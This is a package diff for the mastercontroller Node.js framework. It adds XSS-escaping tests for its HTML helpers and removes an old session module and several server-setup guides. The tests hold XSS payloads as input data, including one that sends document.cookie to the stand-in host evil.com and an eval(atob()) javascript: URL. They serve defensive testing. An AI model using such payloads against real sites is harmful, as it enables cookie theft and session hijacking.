mastercontroller 1.3.1 → 1.3.2

package/test/security/xss.test.js

@@ -0,0 +1,190 @@
+// XSS Protection Tests for MasterHtml.js
+const master = require('../../MasterControl');
+require('../../MasterHtml');
+
+describe('XSS Protection in Form Helpers', () => {
+	let html;
+
+	beforeEach(() => {
+		// Create html instance (it's extended to master.viewList)
+		html = master.viewList.html;
+	});
+
+	describe('linkTo()', () => {
+		test('should escape malicious script in name', () => {
+			const result = html.linkTo('<script>alert("XSS")</script>', '/safe');
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape malicious javascript in href', () => {
+			const result = html.linkTo('Click', 'javascript:alert("XSS")');
+			expect(result).toContain('href="javascript');
+			expect(result).not.toContain('href=javascript'); // Should be quoted
+		});
+
+		test('should escape quote injection', () => {
+			const result = html.linkTo('Click', '" onmouseover="alert(\'XSS\')"');
+			expect(result).toContain('&quot;');
+			expect(result).not.toContain('onmouseover=');
+		});
+	});
+
+	describe('imgTag()', () => {
+		test('should escape XSS in alt attribute', () => {
+			const result = html.imgTag('<script>alert("XSS")</script>', '/image.jpg');
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape onerror handler', () => {
+			const result = html.imgTag('test', '/image.jpg onerror=alert(1)');
+			expect(result).toContain('&quot;');
+			expect(result).toMatch(/src=".*onerror.*"/); // Should be quoted
+		});
+
+		test('should have proper attribute quoting', () => {
+			const result = html.imgTag('test', '/image.jpg');
+			expect(result).toMatch(/src="[^"]+"/);
+			expect(result).toMatch(/alt="[^"]+"/);
+		});
+	});
+
+	describe('textFieldTag()', () => {
+		test('should escape malicious name', () => {
+			const result = html.textFieldTag('<script>alert(1)</script>', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape malicious attributes', () => {
+			const result = html.textFieldTag('username', {
+				value: '"><script>alert(1)</script><input type="hidden'
+			});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&quot;&gt;&lt;script&gt;');
+		});
+
+		test('should properly quote all attributes', () => {
+			const result = html.textFieldTag('test', { value: 'normal', class: 'form-control' });
+			expect(result).toMatch(/name="[^"]+"/);
+			expect(result).toMatch(/value="[^"]+"/);
+			expect(result).toMatch(/class="[^"]+"/);
+		});
+	});
+
+	describe('hiddenFieldTag()', () => {
+		test('should escape malicious value', () => {
+			const result = html.hiddenFieldTag('test', '" onclick="alert(\'XSS\')"', {});
+			expect(result).not.toContain('onclick=');
+			expect(result).toContain('&quot;');
+		});
+
+		test('should escape additional attributes', () => {
+			const result = html.hiddenFieldTag('id', '123', {
+				'data-foo': '"><script>alert(1)</script>'
+			});
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('textAreaTag()', () => {
+		test('should escape message content', () => {
+			const result = html.textAreaTag('comment', '<script>alert("XSS")</script>', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape attributes', () => {
+			const result = html.textAreaTag('comment', 'safe', {
+				placeholder: '"><script>alert(1)</script>'
+			});
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('submitButton()', () => {
+		test('should escape button name', () => {
+			const result = html.submitButton('<script>alert(1)</script>', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&lt;script&gt;');
+		});
+
+		test('should escape attributes', () => {
+			const result = html.submitButton('Submit', {
+				onclick: 'alert(1)'
+			});
+			expect(result).toContain('onclick="alert(1)"'); // Escaped and quoted
+		});
+	});
+
+	describe('emailField()', () => {
+		test('should escape malicious attributes', () => {
+			const result = html.emailField('email', {
+				value: '"><script>alert(1)</script>'
+			});
+			expect(result).not.toContain('<script>');
+		});
+	});
+
+	describe('numberField()', () => {
+		test('should escape min/max/step values', () => {
+			const result = html.numberField('age', '"><script>alert(1)</script>', '100', '1', {});
+			expect(result).not.toContain('<script>');
+			expect(result).toContain('&quot;&gt;&lt;script&gt;');
+		});
+	});
+
+	describe('javaScriptSerializer()', () => {
+		test('should escape closing script tags', () => {
+			const data = { comment: '</script><script>alert("XSS")</script>' };
+			const result = html.javaScriptSerializer('userData', data);
+
+			// Should not contain unescaped </script>
+			expect(result).not.toMatch(/<\/script><script>/);
+			// Should contain escaped version
+			expect(result).toContain('\\u003c/script\\u003e');
+		});
+
+		test('should escape < and > characters', () => {
+			const data = { html: '<div>test</div>' };
+			const result = html.javaScriptSerializer('config', data);
+
+			expect(result).toContain('\\u003c');
+			expect(result).toContain('\\u003e');
+		});
+
+		test('should escape variable name', () => {
+			const result = html.javaScriptSerializer('<script>alert(1)</script>', { test: 'data' });
+			expect(result).toContain('&lt;script&gt;');
+		});
+	});
+
+	describe('Real-World Attack Scenarios', () => {
+		test('should prevent stored XSS attack', () => {
+			// Simulate stored XSS from database
+			const userComment = '<img src=x onerror=alert(document.cookie)>';
+			const result = html.textAreaTag('comment', userComment, {});
+
+			expect(result).not.toContain('onerror=');
+			expect(result).toContain('&lt;img');
+		});
+
+		test('should prevent reflected XSS attack', () => {
+			// Simulate reflected XSS from URL parameter
+			const searchQuery = '"><script>fetch("http://evil.com?c="+document.cookie)</script>';
+			const result = html.textFieldTag('search', { value: searchQuery });
+
+			expect(result).not.toContain('<script>');
+			expect(result).not.toContain('fetch(');
+		});
+
+		test('should prevent DOM-based XSS', () => {
+			const maliciousUrl = 'javascript:eval(atob("YWxlcnQoMSk="))';
+			const result = html.linkTo('Click', maliciousUrl);
+
+			// Should be quoted and escaped
+			expect(result).toMatch(/href="[^"]*"/);
+		});
+	});
+});

package/MasterSession.js

@@ -1,208 +0,0 @@
- 
-// version 0.0.22
-
-var master = require('./MasterControl');
-var cookie = require('cookie');
-var toolClass =  require('./MasterTools');
-var crypto = require('crypto');
-var tools = new toolClass();
-
-class MasterSession{
- 
-    sessions = {};
-    options = {
-        domain: undefined,
-        encode : undefined,
-        maxAge: 900000,
-        expires : undefined ,
-        secure:false,
-        httpOnly:true,
-        sameSite : true,
-        path : '/',
-        secret : this.createSessionID()
-    };
-
-    init(options){
-        var $that = this;
-
-        // Combine the rest of the options carefully
-        this.options = {
-            ...this.options,
-            ...options
-        };
-
-        if(this.options.TID){
-            this.options.secret = TID;
-        }
-
-        // Auto-register with pipeline if available
-        if (master.pipeline) {
-            master.pipeline.use(this.middleware());
-        }
-
-        return {
-            setPath : function(path){
-                $that.options.path = path === undefined ? '/' : path;
-                return this;
-            },
-            sameSiteTrue : function(){
-                $that.options.sameSite = true;
-                return this;
-            },
-            sameSiteFalse : function(){
-                $that.options.sameSite = false;
-                return this;
-            },
-            httpOnlyTrue : function(){
-                $that.options.httpOnly = true;
-                return this;
-            },
-            httpOnlyFalse : function(){
-                $that.options.httpOnly = false;
-                return this;
-            },
-            secureTrue : function(){
-                $that.options.secure = true;
-                return this;
-            },
-            securefalse : function(){
-                $that.options.secure = false;
-                return this;
-            },
-            expires : function(exp){
-                $that.options.expires = exp === undefined ? undefined : exp;
-                return this;
-            },
-            maxAge : function(num){
-                $that.options.maxAge = num === undefined ? 0 : num;
-                return this;
-            },
-            encode: function(func){
-                $that.options.encode = func;
-                return this;
-            },
-            domain : function(dom){
-                $that.options.domain = dom;
-                return this;
-            }
-        };
-    }
-
-    createSessionID(){
-        return crypto.randomBytes(20).toString('hex');
-    }
-
-    getSessionID(){
-         return this.secret;
-    }
-
-    setCookie(name, payload, response, options){
-        var cookieOpt = options === undefined? this.options : options;
-        if(typeof options === "object"){
-            if(options.secret){
-                response.setHeader('Set-Cookie', cookie.serialize(name, tools.encrypt(payload, cookieOpt.secret), cookieOpt));
-            }else{
-
-                response.setHeader('Set-Cookie', cookie.serialize(name, payload, cookieOpt));
-       
-            }
-
-        }
-        else{
-            response.setHeader('Set-Cookie', cookie.serialize(name, payload, cookieOpt));
-        }
-    }
-
-    getCookie (name, request, secret){
-        var cooks = cookie.parse(request.headers.cookie || '');
-
-        if(cooks){
-            if(cooks[name] === undefined){
-                return -1;
-            }
-            if(secret === undefined){
-                if(cooks[name]){
-                    return cooks[name];
-                }
-                else{
-                    return  -1;
-                }
-                //return cooks[name]? -1 : cooks[name];
-            }
-            else{
-                return tools.decrypt(cooks[name], secret);
-            }
-        }
-        else{
-            return -1;
-        }
-    }
-
-    deleteCookie (name, response, options){
-        var cookieOpt = options === undefined? this.options : options;
-        response.setHeader('Set-Cookie', cookie.serialize(name, "", cookieOpt));
-        cookieOpt.expires = undefined;
-    }
-
-    // delete session and cookie
-    delete(name, response){
-        var sessionID = sessions[name];
-        this.options.expires = new Date(0);
-        response.setHeader('Set-Cookie', cookie.serialize(sessionID, "", this.options));
-        delete this.sessions[name];
-        this.options.expires = undefined;
-    }
-
-    // resets all sessions
-    reset(){
-        this.sessions = {};
-    }
-
-    // sets session with random id to get cookie
-    set(name, payload, response, secret, options){
-        var cookieOpt = options === undefined? this.options : options; 
-        var sessionID = this.createSessionID();
-        this.sessions[name] = sessionID;
-        if(secret === undefined){
-            response.setHeader('Set-Cookie', cookie.serialize(sessionID, JSON.stringify(payload), cookieOpt));
-        }
-        else{
-            response.setHeader('Set-Cookie', cookie.serialize(sessionID, tools.encrypt(payload, secret), cookieOpt));
-        }
-    }
-
-    // gets session then gets cookie
-    get(name, request, secret){
-        var sessionID = this.sessions[name];
-        if(sessionID){
-            var cooks = cookie.parse(request.headers.cookie || '');
-            if(cooks){
-                if(secret === undefined){
-                    return cooks[sessionID];
-                }
-                else{
-                   return tools.decrypt(cooks[sessionID], secret);
-                }
-            }
-        }
-        else{
-            return -1;
-        }
-    }
-
-    /**
-     * Get session middleware for the pipeline
-     * Sessions are accessed lazily via master.sessions in controllers
-     */
-    middleware() {
-        var $that = this;
-
-        return async (ctx, next) => {
-            // Sessions are available via master.sessions.get/set in controllers
-            // No action needed here - just continue pipeline
-            await next();
-        };
-    }
-}
-
-master.extend("sessions", MasterSession);

package/docs/server-setup-hostname-binding.md

@@ -1,24 +0,0 @@
-## Server setup: Hostname binding
-
-Bind the listener to a specific interface using `hostname` (or `host`/`http`).
-
-### server.js
-```js
-const master = require('./MasterControl');
-
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'development';
-
-const server = master.setupServer('http');
-master.start(server);
-
-// Bind to localhost only
-master.serverSettings({ httpPort: 3000, hostname: '127.0.0.1', requestTimeout: 60000 });
-
-master.startMVC('app');
-```
-
-### Notes
-- Use `0.0.0.0` to accept connections on all interfaces.
-- In production with a reverse proxy, bind to `127.0.0.1` so only the proxy can reach the app.
-

package/docs/server-setup-http.md

@@ -1,32 +0,0 @@
-## Server setup: HTTP
-
-This example starts a plain HTTP server. Useful for local development, or when you run behind a reverse proxy that terminates TLS.
-
-### server.js (HTTP)
-```js
-const master = require('./MasterControl');
-
-// Point master to your project root and environment
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'development';
-
-// Create HTTP server and bind it
-const server = master.setupServer('http');
-master.start(server);
-
-// Use either explicit settings or your environment JSON
-// Option A: explicit
-// master.serverSettings({ httpPort: 3000, hostname: '127.0.0.1', requestTimeout: 60000 });
-
-// Option B: from env config at config/environments/env.<env>.json
-master.serverSettings(master.env.server);
-
-// Load your routes and controllers
-// If your routes are under <root>/app/**/routes.js
-master.startMVC('app');
-```
-
-### Notes
-- `master.serverSettings` now honors `hostname` (or `host`/`http`) if provided; otherwise it listens on all interfaces.
-- For production, prefer running behind a reverse proxy and keep the app on a high port (e.g., 3000).
-

package/docs/server-setup-https-credentials.md

@@ -1,32 +0,0 @@
-## Server setup: HTTPS with direct credentials
-
-Pass key/cert (and optional chain/ca) directly to `setupServer('https', credentials)`.
-
-### server.js (HTTPS credentials)
-```js
-const fs = require('fs');
-const master = require('./MasterControl');
-
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'production';
-
-const credentials = {
-  key: fs.readFileSync('/etc/ssl/private/site.key'),
-  cert: fs.readFileSync('/etc/ssl/certs/site.crt'),
-  ca: fs.readFileSync('/etc/ssl/certs/chain.pem'),
-  minVersion: 'TLSv1.2',
-  honorCipherOrder: true,
-  ALPNProtocols: ['h2', 'http/1.1']
-};
-
-const server = master.setupServer('https', credentials);
-master.start(server);
-master.serverSettings({ httpPort: 8443, hostname: '0.0.0.0', requestTimeout: 60000 });
-master.startMVC('app');
-```
-
-### Notes
-- Use a high port (e.g., 8443) to avoid running as root, or grant `CAP_NET_BIND_SERVICE` if binding to 443.
-- Strong defaults are ensured if you omit them, but explicitly setting them is recommended.
-- For multiple domains, see the TLS/SNI guide.
-

package/docs/server-setup-https-env-tls-sni.md

@@ -1,62 +0,0 @@
-## Server setup: HTTPS via environment TLS (with SNI and live reload)
-
-This uses `config/environments/env.<env>.json` to configure TLS, SNI (multi-domain), HSTS, and watches cert files for live reload.
-
-### Example env.production.json
-```json
-{
-  "server": {
-    "httpPort": 8443,
-    "hostname": "0.0.0.0",
-    "requestTimeout": 60000,
-    "tls": {
-      "hsts": true,
-      "hstsMaxAge": 15552000,
-      "minVersion": "TLSv1.2",
-      "honorCipherOrder": true,
-      "alpnProtocols": ["h2", "http/1.1"],
-      "default": {
-        "keyPath": "/etc/ssl/private/site.key",
-        "certPath": "/etc/ssl/certs/site.crt",
-        "caPath": "/etc/ssl/certs/chain.pem"
-      },
-      "sni": {
-        "example.com": {
-          "keyPath": "/etc/ssl/private/example.key",
-          "certPath": "/etc/ssl/certs/example.crt",
-          "caPath": "/etc/ssl/certs/chain.pem"
-        },
-        "api.example.com": {
-          "keyPath": "/etc/ssl/private/api.key",
-          "certPath": "/etc/ssl/certs/api.crt",
-          "caPath": "/etc/ssl/certs/chain.pem"
-        }
-      }
-    }
-  }
-}
-```
-
-### server.js (HTTPS from env)
-```js
-const master = require('./MasterControl');
-
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'production';
-
-// No credentials passed; MasterControl will auto-load TLS from env
-const server = master.setupServer('https');
-master.start(server);
-master.serverSettings(master.env.server);
-master.startMVC('app');
-
-// Optional: HTTP->HTTPS redirect (listen on 80)
-// master.startHttpToHttpsRedirect(80, '0.0.0.0');
-```
-
-### How it works
-- `default`: certs used when SNI domain does not match any entry.
-- `sni`: per-domain certificates; the server chooses the right cert via `SNICallback`.
-- Live reload: when any `keyPath`/`certPath`/`caPath` changes, the secure context is rebuilt in-memory (no restart needed).
-- HSTS: when enabled, responses over HTTPS include `strict-transport-security` with the configured max-age.
-

package/docs/server-setup-nginx-reverse-proxy.md

@@ -1,46 +0,0 @@
-## Server setup: Nginx reverse proxy with HTTP→HTTPS redirect
-
-Recommended production pattern: Node app on a high port (HTTP), Nginx on 80/443 handling TLS and redirects.
-
-### server.js (app on HTTP localhost:3000)
-```js
-const master = require('./MasterControl');
-
-master.root = __dirname;
-master.environmentType = process.env.NODE_ENV || 'production';
-
-const server = master.setupServer('http');
-master.start(server);
-master.serverSettings({ httpPort: 3000, hostname: '127.0.0.1', requestTimeout: 60000 });
-master.startMVC('app');
-```
-
-### Nginx config
-```nginx
-server {
-  listen 80;
-  server_name yourdomain.com;
-  return 301 https://$host$request_uri;
-}
-
-server {
-  listen 443 ssl http2;
-  server_name yourdomain.com;
-
-  ssl_certificate /etc/letsencrypt/live/yourdomain.com/fullchain.pem;
-  ssl_certificate_key /etc/letsencrypt/live/yourdomain.com/privkey.pem;
-
-  location / {
-    proxy_pass http://127.0.0.1:3000;
-    proxy_set_header Host $host;
-    proxy_set_header X-Real-IP $remote_addr;
-    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
-    proxy_set_header X-Forwarded-Proto $scheme;
-  }
-}
-```
-
-### Notes
-- Use certbot or another ACME client to manage certificates and renewals automatically.
-- This keeps Node unprivileged (no need to bind to 443) and simplifies TLS.
-